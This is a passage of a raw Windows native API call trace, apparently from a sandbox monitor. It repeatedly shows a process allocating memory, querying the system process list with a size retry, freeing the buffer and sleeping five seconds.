ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0160.869] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0160.872] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0160.872] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0160.884] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0160.884] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0160.885] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0160.885] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0160.885] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0160.888] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0160.888] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0160.900] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0160.900] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0160.901] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0160.901] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0160.901] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0160.904] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0160.905] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0160.914] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0160.914] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0160.915] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0160.915] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0160.915] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0160.917] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0160.918] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0160.930] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0160.930] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0160.931] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0160.931] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0160.931] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0160.933] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0160.934] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0160.946] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0160.946] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0160.946] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0160.947] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0160.947] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0160.949] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0160.950] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0160.961] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0160.962] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0160.962] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0160.962] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0160.963] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0160.965] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0160.965] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0160.977] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0160.977] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0160.978] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0160.978] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0160.978] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0160.980] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0160.980] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0160.995] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0160.995] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0160.995] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0160.996] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0160.996] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0160.998] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0160.998] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0161.009] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0161.009] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0161.010] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0161.011] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0161.011] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0161.013] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0161.014] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0161.024] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0161.024] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0161.025] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0161.025] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0161.025] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0161.029] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0161.030] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0161.039] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0161.039] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0161.040] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0161.040] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0161.040] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0161.042] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0161.042] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0161.063] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0161.063] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0161.063] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0161.064] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0161.064] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0161.066] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0161.066] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0161.070] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0161.070] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0161.071] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0161.071] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0161.071] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0161.074] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0161.074] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0161.086] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0161.086] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0161.087] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0161.087] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0161.087] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0161.089] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0161.090] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0161.127] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0161.127] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0161.128] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0161.128] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0161.128] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0161.131] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0161.131] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0161.133] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0161.133] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0161.133] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0161.133] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0161.134] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0161.136] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0161.136] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0161.148] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0161.149] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0161.149] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0161.149] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0161.149] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0161.151] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0161.152] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0161.164] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0161.164] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0161.165] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0161.165] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0161.165] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0161.167] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0161.168] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0161.217] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0161.217] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0161.218] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0161.218] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0161.218] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0161.220] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0161.220] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0161.272] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0161.272] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0161.272] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0161.273] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0161.273] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0161.275] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0161.275] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0161.312] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0161.313] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0161.313] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0161.313] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0161.314] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 